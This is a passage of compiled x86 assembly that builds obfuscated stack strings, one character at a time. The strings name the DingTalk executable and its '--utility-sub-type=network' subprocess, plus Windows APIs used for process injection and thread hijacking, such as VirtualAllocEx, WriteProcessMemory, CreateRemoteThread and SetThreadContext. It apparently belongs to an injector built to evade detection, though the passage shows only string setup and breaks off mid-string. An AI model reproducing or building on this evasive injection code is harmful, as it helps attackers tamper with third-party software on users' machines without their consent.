	mov	edx, 46					; 0000002eH
	mov	WORD PTR _kernel32_dll_name$[ebp+16], dx
	mov	eax, 100				; 00000064H
	mov	WORD PTR _kernel32_dll_name$[ebp+18], ax
	mov	ecx, 108				; 0000006cH
	mov	WORD PTR _kernel32_dll_name$[ebp+20], cx
	mov	edx, 108				; 0000006cH
	mov	WORD PTR _kernel32_dll_name$[ebp+22], dx
	xor	eax, eax
	mov	WORD PTR _kernel32_dll_name$[ebp+24], ax
; Line 118
	mov	BYTE PTR _ntdll_name$[ebp], 110		; 0000006eH
	mov	BYTE PTR _ntdll_name$[ebp+1], 116	; 00000074H
	mov	BYTE PTR _ntdll_name$[ebp+2], 100	; 00000064H
	mov	BYTE PTR _ntdll_name$[ebp+3], 108	; 0000006cH
	mov	BYTE PTR _ntdll_name$[ebp+4], 108	; 0000006cH
	mov	BYTE PTR _ntdll_name$[ebp+5], 46	; 0000002eH
	mov	BYTE PTR _ntdll_name$[ebp+6], 100	; 00000064H
	mov	BYTE PTR _ntdll_name$[ebp+7], 108	; 0000006cH
	mov	BYTE PTR _ntdll_name$[ebp+8], 108	; 0000006cH
	mov	BYTE PTR _ntdll_name$[ebp+9], 0
; Line 120
	mov	ecx, 100				; 00000064H
	mov	WORD PTR _dingtalk$[ebp], cx
	mov	edx, 105				; 00000069H
	mov	WORD PTR _dingtalk$[ebp+2], dx
	mov	eax, 110				; 0000006eH
	mov	WORD PTR _dingtalk$[ebp+4], ax
	mov	ecx, 103				; 00000067H
	mov	WORD PTR _dingtalk$[ebp+6], cx
	mov	edx, 116				; 00000074H
	mov	WORD PTR _dingtalk$[ebp+8], dx
	mov	eax, 97					; 00000061H
	mov	WORD PTR _dingtalk$[ebp+10], ax
	mov	ecx, 108				; 0000006cH
	mov	WORD PTR _dingtalk$[ebp+12], cx
	mov	edx, 107				; 0000006bH
	mov	WORD PTR _dingtalk$[ebp+14], dx
	mov	eax, 46					; 0000002eH
	mov	WORD PTR _dingtalk$[ebp+16], ax
	mov	ecx, 101				; 00000065H
	mov	WORD PTR _dingtalk$[ebp+18], cx
	mov	edx, 120				; 00000078H
	mov	WORD PTR _dingtalk$[ebp+20], dx
	mov	eax, 101				; 00000065H
	mov	WORD PTR _dingtalk$[ebp+22], ax
	xor	ecx, ecx
	mov	WORD PTR _dingtalk$[ebp+24], cx
; Line 121
	mov	edx, 68					; 00000044H
	mov	WORD PTR _dingtalk_upper$[ebp], dx
	mov	eax, 73					; 00000049H
	mov	WORD PTR _dingtalk_upper$[ebp+2], ax
	mov	ecx, 78					; 0000004eH
	mov	WORD PTR _dingtalk_upper$[ebp+4], cx
	mov	edx, 71					; 00000047H
	mov	WORD PTR _dingtalk_upper$[ebp+6], dx
	mov	eax, 84					; 00000054H
	mov	WORD PTR _dingtalk_upper$[ebp+8], ax
	mov	ecx, 65					; 00000041H
	mov	WORD PTR _dingtalk_upper$[ebp+10], cx
	mov	edx, 76					; 0000004cH
	mov	WORD PTR _dingtalk_upper$[ebp+12], dx
	mov	eax, 75					; 0000004bH
	mov	WORD PTR _dingtalk_upper$[ebp+14], ax
	mov	ecx, 46					; 0000002eH
	mov	WORD PTR _dingtalk_upper$[ebp+16], cx
	mov	edx, 69					; 00000045H
	mov	WORD PTR _dingtalk_upper$[ebp+18], dx
	mov	eax, 88					; 00000058H
	mov	WORD PTR _dingtalk_upper$[ebp+20], ax
	mov	ecx, 69					; 00000045H
	mov	WORD PTR _dingtalk_upper$[ebp+22], cx
	xor	edx, edx
	mov	WORD PTR _dingtalk_upper$[ebp+24], dx
; Line 122
	mov	eax, 45					; 0000002dH
	mov	WORD PTR _dingtalk_pattern$[ebp], ax
	mov	ecx, 45					; 0000002dH
	mov	WORD PTR _dingtalk_pattern$[ebp+2], cx
	mov	edx, 117				; 00000075H
	mov	WORD PTR _dingtalk_pattern$[ebp+4], dx
	mov	eax, 116				; 00000074H
	mov	WORD PTR _dingtalk_pattern$[ebp+6], ax
	mov	ecx, 105				; 00000069H
	mov	WORD PTR _dingtalk_pattern$[ebp+8], cx
	mov	edx, 108				; 0000006cH
	mov	WORD PTR _dingtalk_pattern$[ebp+10], dx
	mov	eax, 105				; 00000069H
	mov	WORD PTR _dingtalk_pattern$[ebp+12], ax
	mov	ecx, 116				; 00000074H
	mov	WORD PTR _dingtalk_pattern$[ebp+14], cx
	mov	edx, 121				; 00000079H
	mov	WORD PTR _dingtalk_pattern$[ebp+16], dx
	mov	eax, 45					; 0000002dH
	mov	WORD PTR _dingtalk_pattern$[ebp+18], ax
	mov	ecx, 115				; 00000073H
	mov	WORD PTR _dingtalk_pattern$[ebp+20], cx
	mov	edx, 117				; 00000075H
	mov	WORD PTR _dingtalk_pattern$[ebp+22], dx
	mov	eax, 98					; 00000062H
	mov	WORD PTR _dingtalk_pattern$[ebp+24], ax
	mov	ecx, 45					; 0000002dH
	mov	WORD PTR _dingtalk_pattern$[ebp+26], cx
	mov	edx, 116				; 00000074H
	mov	WORD PTR _dingtalk_pattern$[ebp+28], dx
	mov	eax, 121				; 00000079H
	mov	WORD PTR _dingtalk_pattern$[ebp+30], ax
	mov	ecx, 112				; 00000070H
	mov	WORD PTR _dingtalk_pattern$[ebp+32], cx
	mov	edx, 101				; 00000065H
	mov	WORD PTR _dingtalk_pattern$[ebp+34], dx
	mov	eax, 61					; 0000003dH
	mov	WORD PTR _dingtalk_pattern$[ebp+36], ax
	mov	ecx, 110				; 0000006eH
	mov	WORD PTR _dingtalk_pattern$[ebp+38], cx
	mov	edx, 101				; 00000065H
	mov	WORD PTR _dingtalk_pattern$[ebp+40], dx
	mov	eax, 116				; 00000074H
	mov	WORD PTR _dingtalk_pattern$[ebp+42], ax
	mov	ecx, 119				; 00000077H
	mov	WORD PTR _dingtalk_pattern$[ebp+44], cx
	mov	edx, 111				; 0000006fH
	mov	WORD PTR _dingtalk_pattern$[ebp+46], dx
	mov	eax, 114				; 00000072H
	mov	WORD PTR _dingtalk_pattern$[ebp+48], ax
	mov	ecx, 107				; 0000006bH
	mov	WORD PTR _dingtalk_pattern$[ebp+50], cx
	xor	edx, edx
	mov	WORD PTR _dingtalk_pattern$[ebp+52], dx
; Line 124
	mov	BYTE PTR _load_lib_name$[ebp], 76	; 0000004cH
	mov	BYTE PTR _load_lib_name$[ebp+1], 111	; 0000006fH
	mov	BYTE PTR _load_lib_name$[ebp+2], 97	; 00000061H
	mov	BYTE PTR _load_lib_name$[ebp+3], 100	; 00000064H
	mov	BYTE PTR _load_lib_name$[ebp+4], 76	; 0000004cH
	mov	BYTE PTR _load_lib_name$[ebp+5], 105	; 00000069H
	mov	BYTE PTR _load_lib_name$[ebp+6], 98	; 00000062H
	mov	BYTE PTR _load_lib_name$[ebp+7], 114	; 00000072H
	mov	BYTE PTR _load_lib_name$[ebp+8], 97	; 00000061H
	mov	BYTE PTR _load_lib_name$[ebp+9], 114	; 00000072H
	mov	BYTE PTR _load_lib_name$[ebp+10], 121	; 00000079H
	mov	BYTE PTR _load_lib_name$[ebp+11], 65	; 00000041H
	mov	BYTE PTR _load_lib_name$[ebp+12], 0
; Line 125
	mov	BYTE PTR _get_proc_name$[ebp], 71	; 00000047H
	mov	BYTE PTR _get_proc_name$[ebp+1], 101	; 00000065H
	mov	BYTE PTR _get_proc_name$[ebp+2], 116	; 00000074H
	mov	BYTE PTR _get_proc_name$[ebp+3], 80	; 00000050H
	mov	BYTE PTR _get_proc_name$[ebp+4], 114	; 00000072H
	mov	BYTE PTR _get_proc_name$[ebp+5], 111	; 0000006fH
	mov	BYTE PTR _get_proc_name$[ebp+6], 99	; 00000063H
	mov	BYTE PTR _get_proc_name$[ebp+7], 65	; 00000041H
	mov	BYTE PTR _get_proc_name$[ebp+8], 100	; 00000064H
	mov	BYTE PTR _get_proc_name$[ebp+9], 100	; 00000064H
	mov	BYTE PTR _get_proc_name$[ebp+10], 114	; 00000072H
	mov	BYTE PTR _get_proc_name$[ebp+11], 101	; 00000065H
	mov	BYTE PTR _get_proc_name$[ebp+12], 115	; 00000073H
	mov	BYTE PTR _get_proc_name$[ebp+13], 115	; 00000073H
	mov	BYTE PTR _get_proc_name$[ebp+14], 0
; Line 126
	mov	BYTE PTR _open_process_name$[ebp], 79	; 0000004fH
	mov	BYTE PTR _open_process_name$[ebp+1], 112 ; 00000070H
	mov	BYTE PTR _open_process_name$[ebp+2], 101 ; 00000065H
	mov	BYTE PTR _open_process_name$[ebp+3], 110 ; 0000006eH
	mov	BYTE PTR _open_process_name$[ebp+4], 80	; 00000050H
	mov	BYTE PTR _open_process_name$[ebp+5], 114 ; 00000072H
	mov	BYTE PTR _open_process_name$[ebp+6], 111 ; 0000006fH
	mov	BYTE PTR _open_process_name$[ebp+7], 99	; 00000063H
	mov	BYTE PTR _open_process_name$[ebp+8], 101 ; 00000065H
	mov	BYTE PTR _open_process_name$[ebp+9], 115 ; 00000073H
	mov	BYTE PTR _open_process_name$[ebp+10], 115 ; 00000073H
	mov	BYTE PTR _open_process_name$[ebp+11], 0
; Line 127
	mov	BYTE PTR _get_module_handlea_name$[ebp], 71 ; 00000047H
	mov	BYTE PTR _get_module_handlea_name$[ebp+1], 101 ; 00000065H
	mov	BYTE PTR _get_module_handlea_name$[ebp+2], 116 ; 00000074H
	mov	BYTE PTR _get_module_handlea_name$[ebp+3], 77 ; 0000004dH
	mov	BYTE PTR _get_module_handlea_name$[ebp+4], 111 ; 0000006fH
	mov	BYTE PTR _get_module_handlea_name$[ebp+5], 100 ; 00000064H
	mov	BYTE PTR _get_module_handlea_name$[ebp+6], 117 ; 00000075H
	mov	BYTE PTR _get_module_handlea_name$[ebp+7], 108 ; 0000006cH
	mov	BYTE PTR _get_module_handlea_name$[ebp+8], 101 ; 00000065H
	mov	BYTE PTR _get_module_handlea_name$[ebp+9], 72 ; 00000048H
	mov	BYTE PTR _get_module_handlea_name$[ebp+10], 97 ; 00000061H
	mov	BYTE PTR _get_module_handlea_name$[ebp+11], 110 ; 0000006eH
	mov	BYTE PTR _get_module_handlea_name$[ebp+12], 100 ; 00000064H
	mov	BYTE PTR _get_module_handlea_name$[ebp+13], 108 ; 0000006cH
	mov	BYTE PTR _get_module_handlea_name$[ebp+14], 101 ; 00000065H
	mov	BYTE PTR _get_module_handlea_name$[ebp+15], 65 ; 00000041H
	mov	BYTE PTR _get_module_handlea_name$[ebp+16], 0
; Line 128
	mov	BYTE PTR _get_current_process_name$[ebp], 71 ; 00000047H
	mov	BYTE PTR _get_current_process_name$[ebp+1], 101 ; 00000065H
	mov	BYTE PTR _get_current_process_name$[ebp+2], 116 ; 00000074H
	mov	BYTE PTR _get_current_process_name$[ebp+3], 67 ; 00000043H
	mov	BYTE PTR _get_current_process_name$[ebp+4], 117 ; 00000075H
	mov	BYTE PTR _get_current_process_name$[ebp+5], 114 ; 00000072H
	mov	BYTE PTR _get_current_process_name$[ebp+6], 114 ; 00000072H
	mov	BYTE PTR _get_current_process_name$[ebp+7], 101 ; 00000065H
	mov	BYTE PTR _get_current_process_name$[ebp+8], 110 ; 0000006eH
	mov	BYTE PTR _get_current_process_name$[ebp+9], 116 ; 00000074H
	mov	BYTE PTR _get_current_process_name$[ebp+10], 80 ; 00000050H
	mov	BYTE PTR _get_current_process_name$[ebp+11], 114 ; 00000072H
	mov	BYTE PTR _get_current_process_name$[ebp+12], 111 ; 0000006fH
	mov	BYTE PTR _get_current_process_name$[ebp+13], 99 ; 00000063H
	mov	BYTE PTR _get_current_process_name$[ebp+14], 101 ; 00000065H
	mov	BYTE PTR _get_current_process_name$[ebp+15], 115 ; 00000073H
	mov	BYTE PTR _get_current_process_name$[ebp+16], 115 ; 00000073H
	mov	BYTE PTR _get_current_process_name$[ebp+17], 0
; Line 129
	mov	BYTE PTR _virtual_alloc_name$[ebp], 86	; 00000056H
	mov	BYTE PTR _virtual_alloc_name$[ebp+1], 105 ; 00000069H
	mov	BYTE PTR _virtual_alloc_name$[ebp+2], 114 ; 00000072H
	mov	BYTE PTR _virtual_alloc_name$[ebp+3], 116 ; 00000074H
	mov	BYTE PTR _virtual_alloc_name$[ebp+4], 117 ; 00000075H
	mov	BYTE PTR _virtual_alloc_name$[ebp+5], 97 ; 00000061H
	mov	BYTE PTR _virtual_alloc_name$[ebp+6], 108 ; 0000006cH
	mov	BYTE PTR _virtual_alloc_name$[ebp+7], 65 ; 00000041H
	mov	BYTE PTR _virtual_alloc_name$[ebp+8], 108 ; 0000006cH
	mov	BYTE PTR _virtual_alloc_name$[ebp+9], 108 ; 0000006cH
	mov	BYTE PTR _virtual_alloc_name$[ebp+10], 111 ; 0000006fH
	mov	BYTE PTR _virtual_alloc_name$[ebp+11], 99 ; 00000063H
	mov	BYTE PTR _virtual_alloc_name$[ebp+12], 0
; Line 130
	mov	BYTE PTR _virtual_free_name$[ebp], 86	; 00000056H
	mov	BYTE PTR _virtual_free_name$[ebp+1], 105 ; 00000069H
	mov	BYTE PTR _virtual_free_name$[ebp+2], 114 ; 00000072H
	mov	BYTE PTR _virtual_free_name$[ebp+3], 116 ; 00000074H
	mov	BYTE PTR _virtual_free_name$[ebp+4], 117 ; 00000075H
	mov	BYTE PTR _virtual_free_name$[ebp+5], 97	; 00000061H
	mov	BYTE PTR _virtual_free_name$[ebp+6], 108 ; 0000006cH
	mov	BYTE PTR _virtual_free_name$[ebp+7], 70	; 00000046H
	mov	BYTE PTR _virtual_free_name$[ebp+8], 114 ; 00000072H
	mov	BYTE PTR _virtual_free_name$[ebp+9], 101 ; 00000065H
	mov	BYTE PTR _virtual_free_name$[ebp+10], 101 ; 00000065H
	mov	BYTE PTR _virtual_free_name$[ebp+11], 0
; Line 131
	mov	BYTE PTR _read_process_memory_name$[ebp], 82 ; 00000052H
	mov	BYTE PTR _read_process_memory_name$[ebp+1], 101 ; 00000065H
	mov	BYTE PTR _read_process_memory_name$[ebp+2], 97 ; 00000061H
	mov	BYTE PTR _read_process_memory_name$[ebp+3], 100 ; 00000064H
	mov	BYTE PTR _read_process_memory_name$[ebp+4], 80 ; 00000050H
	mov	BYTE PTR _read_process_memory_name$[ebp+5], 114 ; 00000072H
	mov	BYTE PTR _read_process_memory_name$[ebp+6], 111 ; 0000006fH
	mov	BYTE PTR _read_process_memory_name$[ebp+7], 99 ; 00000063H
	mov	BYTE PTR _read_process_memory_name$[ebp+8], 101 ; 00000065H
	mov	BYTE PTR _read_process_memory_name$[ebp+9], 115 ; 00000073H
	mov	BYTE PTR _read_process_memory_name$[ebp+10], 115 ; 00000073H
	mov	BYTE PTR _read_process_memory_name$[ebp+11], 77 ; 0000004dH
	mov	BYTE PTR _read_process_memory_name$[ebp+12], 101 ; 00000065H
	mov	BYTE PTR _read_process_memory_name$[ebp+13], 109 ; 0000006dH
	mov	BYTE PTR _read_process_memory_name$[ebp+14], 111 ; 0000006fH
	mov	BYTE PTR _read_process_memory_name$[ebp+15], 114 ; 00000072H
	mov	BYTE PTR _read_process_memory_name$[ebp+16], 121 ; 00000079H
	mov	BYTE PTR _read_process_memory_name$[ebp+17], 0
; Line 132
	mov	BYTE PTR _nt_query_system_information_name$[ebp], 78 ; 0000004eH
	mov	BYTE PTR _nt_query_system_information_name$[ebp+1], 116 ; 00000074H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+2], 81 ; 00000051H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+3], 117 ; 00000075H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+4], 101 ; 00000065H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+5], 114 ; 00000072H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+6], 121 ; 00000079H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+7], 83 ; 00000053H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+8], 121 ; 00000079H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+9], 115 ; 00000073H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+10], 116 ; 00000074H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+11], 101 ; 00000065H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+12], 109 ; 0000006dH
	mov	BYTE PTR _nt_query_system_information_name$[ebp+13], 73 ; 00000049H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+14], 110 ; 0000006eH
	mov	BYTE PTR _nt_query_system_information_name$[ebp+15], 102 ; 00000066H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+16], 111 ; 0000006fH
	mov	BYTE PTR _nt_query_system_information_name$[ebp+17], 114 ; 00000072H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+18], 109 ; 0000006dH
	mov	BYTE PTR _nt_query_system_information_name$[ebp+19], 97 ; 00000061H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+20], 116 ; 00000074H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+21], 105 ; 00000069H
	mov	BYTE PTR _nt_query_system_information_name$[ebp+22], 111 ; 0000006fH
	mov	BYTE PTR _nt_query_system_information_name$[ebp+23], 110 ; 0000006eH
	mov	BYTE PTR _nt_query_system_information_name$[ebp+24], 0
; Line 133
	mov	BYTE PTR _nt_query_information_process_name$[ebp], 78 ; 0000004eH
	mov	BYTE PTR _nt_query_information_process_name$[ebp+1], 116 ; 00000074H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+2], 81 ; 00000051H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+3], 117 ; 00000075H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+4], 101 ; 00000065H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+5], 114 ; 00000072H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+6], 121 ; 00000079H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+7], 73 ; 00000049H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+8], 110 ; 0000006eH
	mov	BYTE PTR _nt_query_information_process_name$[ebp+9], 102 ; 00000066H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+10], 111 ; 0000006fH
	mov	BYTE PTR _nt_query_information_process_name$[ebp+11], 114 ; 00000072H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+12], 109 ; 0000006dH
	mov	BYTE PTR _nt_query_information_process_name$[ebp+13], 97 ; 00000061H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+14], 116 ; 00000074H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+15], 105 ; 00000069H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+16], 111 ; 0000006fH
	mov	BYTE PTR _nt_query_information_process_name$[ebp+17], 110 ; 0000006eH
	mov	BYTE PTR _nt_query_information_process_name$[ebp+18], 80 ; 00000050H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+19], 114 ; 00000072H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+20], 111 ; 0000006fH
	mov	BYTE PTR _nt_query_information_process_name$[ebp+21], 99 ; 00000063H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+22], 101 ; 00000065H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+23], 115 ; 00000073H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+24], 115 ; 00000073H
	mov	BYTE PTR _nt_query_information_process_name$[ebp+25], 0
; Line 136
	mov	BYTE PTR _VirtualAllocEx_name$[ebp], 86	; 00000056H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+1], 105 ; 00000069H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+2], 114 ; 00000072H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+3], 116 ; 00000074H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+4], 117 ; 00000075H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+5], 97 ; 00000061H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+6], 108 ; 0000006cH
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+7], 65 ; 00000041H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+8], 108 ; 0000006cH
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+9], 108 ; 0000006cH
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+10], 111 ; 0000006fH
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+11], 99 ; 00000063H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+12], 69 ; 00000045H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+13], 120 ; 00000078H
	mov	BYTE PTR _VirtualAllocEx_name$[ebp+14], 0
; Line 137
	mov	BYTE PTR _CreateRemoteThread_name$[ebp], 67 ; 00000043H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+1], 114 ; 00000072H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+2], 101 ; 00000065H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+3], 97 ; 00000061H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+4], 116 ; 00000074H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+5], 101 ; 00000065H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+6], 82 ; 00000052H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+7], 101 ; 00000065H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+8], 109 ; 0000006dH
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+9], 111 ; 0000006fH
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+10], 116 ; 00000074H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+11], 101 ; 00000065H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+12], 84 ; 00000054H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+13], 104 ; 00000068H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+14], 114 ; 00000072H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+15], 101 ; 00000065H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+16], 97 ; 00000061H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+17], 100 ; 00000064H
	mov	BYTE PTR _CreateRemoteThread_name$[ebp+18], 0
; Line 138
	mov	BYTE PTR _WriteProcessMemory_name$[ebp], 87 ; 00000057H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+1], 114 ; 00000072H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+2], 105 ; 00000069H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+3], 116 ; 00000074H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+4], 101 ; 00000065H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+5], 80 ; 00000050H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+6], 114 ; 00000072H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+7], 111 ; 0000006fH
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+8], 99 ; 00000063H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+9], 101 ; 00000065H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+10], 115 ; 00000073H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+11], 115 ; 00000073H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+12], 77 ; 0000004dH
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+13], 101 ; 00000065H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+14], 109 ; 0000006dH
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+15], 111 ; 0000006fH
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+16], 114 ; 00000072H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+17], 121 ; 00000079H
	mov	BYTE PTR _WriteProcessMemory_name$[ebp+18], 0
; Line 140
	mov	BYTE PTR _open_thread_name$[ebp], 79	; 0000004fH
	mov	BYTE PTR _open_thread_name$[ebp+1], 112	; 00000070H
	mov	BYTE PTR _open_thread_name$[ebp+2], 101	; 00000065H
	mov	BYTE PTR _open_thread_name$[ebp+3], 110	; 0000006eH
	mov	BYTE PTR _open_thread_name$[ebp+4], 84	; 00000054H
	mov	BYTE PTR _open_thread_name$[ebp+5], 104	; 00000068H
	mov	BYTE PTR _open_thread_name$[ebp+6], 114	; 00000072H
	mov	BYTE PTR _open_thread_name$[ebp+7], 101	; 00000065H
	mov	BYTE PTR _open_thread_name$[ebp+8], 97	; 00000061H
	mov	BYTE PTR _open_thread_name$[ebp+9], 100	; 00000064H
	mov	BYTE PTR _open_thread_name$[ebp+10], 0
; Line 141
	mov	BYTE PTR _SuspendThread_name$[ebp], 83	; 00000053H
	mov	BYTE PTR _SuspendThread_name$[ebp+1], 117 ; 00000075H
	mov	BYTE PTR _SuspendThread_name$[ebp+2], 115 ; 00000073H
	mov	BYTE PTR _SuspendThread_name$[ebp+3], 112 ; 00000070H
	mov	BYTE PTR _SuspendThread_name$[ebp+4], 101 ; 00000065H
	mov	BYTE PTR _SuspendThread_name$[ebp+5], 110 ; 0000006eH
	mov	BYTE PTR _SuspendThread_name$[ebp+6], 100 ; 00000064H
	mov	BYTE PTR _SuspendThread_name$[ebp+7], 84 ; 00000054H
	mov	BYTE PTR _SuspendThread_name$[ebp+8], 104 ; 00000068H
	mov	BYTE PTR _SuspendThread_name$[ebp+9], 114 ; 00000072H
	mov	BYTE PTR _SuspendThread_name$[ebp+10], 101 ; 00000065H
	mov	BYTE PTR _SuspendThread_name$[ebp+11], 97 ; 00000061H
	mov	BYTE PTR _SuspendThread_name$[ebp+12], 100 ; 00000064H
	mov	BYTE PTR _SuspendThread_name$[ebp+13], 0
; Line 142
	mov	BYTE PTR _ResumeThread_name$[ebp], 82	; 00000052H
	mov	BYTE PTR _ResumeThread_name$[ebp+1], 101 ; 00000065H
	mov	BYTE PTR _ResumeThread_name$[ebp+2], 115 ; 00000073H
	mov	BYTE PTR _ResumeThread_name$[ebp+3], 117 ; 00000075H
	mov	BYTE PTR _ResumeThread_name$[ebp+4], 109 ; 0000006dH
	mov	BYTE PTR _ResumeThread_name$[ebp+5], 101 ; 00000065H
	mov	BYTE PTR _ResumeThread_name$[ebp+6], 84	; 00000054H
	mov	BYTE PTR _ResumeThread_name$[ebp+7], 104 ; 00000068H
	mov	BYTE PTR _ResumeThread_name$[ebp+8], 114 ; 00000072H
	mov	BYTE PTR _ResumeThread_name$[ebp+9], 101 ; 00000065H
	mov	BYTE PTR _ResumeThread_name$[ebp+10], 97 ; 00000061H
	mov	BYTE PTR _ResumeThread_name$[ebp+11], 100 ; 00000064H
	mov	BYTE PTR _ResumeThread_name$[ebp+12], 0
; Line 143
	mov	BYTE PTR _GetThreadContext_name$[ebp], 71 ; 00000047H
	mov	BYTE PTR _GetThreadContext_name$[ebp+1], 101 ; 00000065H
	mov	BYTE PTR _GetThreadContext_name$[ebp+2], 116 ; 00000074H
	mov	BYTE PTR _GetThreadContext_name$[ebp+3], 84 ; 00000054H
	mov	BYTE PTR _GetThreadContext_name$[ebp+4], 104 ; 00000068H
	mov	BYTE PTR _GetThreadContext_name$[ebp+5], 114 ; 00000072H
	mov	BYTE PTR _GetThreadContext_name$[ebp+6], 101 ; 00000065H
	mov	BYTE PTR _GetThreadContext_name$[ebp+7], 97 ; 00000061H
	mov	BYTE PTR _GetThreadContext_name$[ebp+8], 100 ; 00000064H
	mov	BYTE PTR _GetThreadContext_name$[ebp+9], 67 ; 00000043H
	mov	BYTE PTR _GetThreadContext_name$[ebp+10], 111 ; 0000006fH
	mov	BYTE PTR _GetThreadContext_name$[ebp+11], 110 ; 0000006eH
	mov	BYTE PTR _GetThreadContext_name$[ebp+12], 116 ; 00000074H
	mov	BYTE PTR _GetThreadContext_name$[ebp+13], 101 ; 00000065H
	mov	BYTE PTR _GetThreadContext_name$[ebp+14], 120 ; 00000078H
	mov	BYTE PTR _GetThreadContext_name$[ebp+15], 116 ; 00000074H
	mov	BYTE PTR _GetThreadContext_name$[ebp+16], 0
; Line 144
	mov	BYTE PTR _SetThreadContext_name$[ebp], 83 ; 00000053H
	mov	BYTE PTR _SetThreadContext_name$[ebp+1], 101 ; 00000065H
	mov	BYTE PTR _SetThreadContext_name$[ebp+2], 116 ; 00000074H
	mov	BYTE PTR _SetThreadContext_name$[ebp+3], 84 ; 00000054H
	mov	BYTE PTR _SetThreadContext_name$[ebp+4], 104 ; 00000068H
	mov	BYTE PTR _SetThreadContext_name$[ebp+5], 114 ; 00000072H
	mov	BYTE PTR _SetThreadContext_name$[ebp+6], 101 ; 00000065H
	mov	BYTE PTR _SetThreadContext_name$[ebp+7], 97 ; 00000061H
	mov	BYTE PTR _SetThreadContext_name$[ebp+8], 100 ; 00000064H
	mov	BYTE PTR _SetThreadContext_name$[ebp+9], 67 ; 00000043H
	mov	BYTE PTR _SetThreadContext_name$[ebp+10], 111 ; 0000006fH
	mov	BYTE PTR _SetThreadContext_name$[ebp+11], 110 ; 0000006eH
	mov	BYTE PTR _SetThreadContext_name$[ebp+12], 116 ; 00000074H
	mov	BYTE PTR _SetThreadContext_name$[ebp+13], 101 ; 00000065H
	mov	BYTE PTR _SetThreadContext_name$[ebp+14], 120 ; 00000078H
	mov	BYTE PTR _SetThreadContext_name$[ebp+15], 116 ; 00000074H
	mov	BYTE PTR _SetThreadContext_name$[ebp+16], 0
; Line 146
	mov	BYTE PTR _Thread32Next_name$[ebp], 84	; 00000054H
	mov	BYTE PTR _Thread32Next_name$[ebp+1], 104 ; 00000068H
	mov	BYTE PTR _Thread32Next_name$[ebp+2], 114 ; 00000072H
	mov	BYTE PTR _Thread32Next_name$[ebp+3], 101 ; 00000065H
	mov	BYTE PTR _Thread32Next_name$[ebp+4], 97	; 00000061H
	mov	BYTE PTR _Thread32Next_name$[ebp+5], 100 ; 00000064H
	mov	BYTE PTR _Thread32Next_name$[ebp+6], 51	; 00000033H
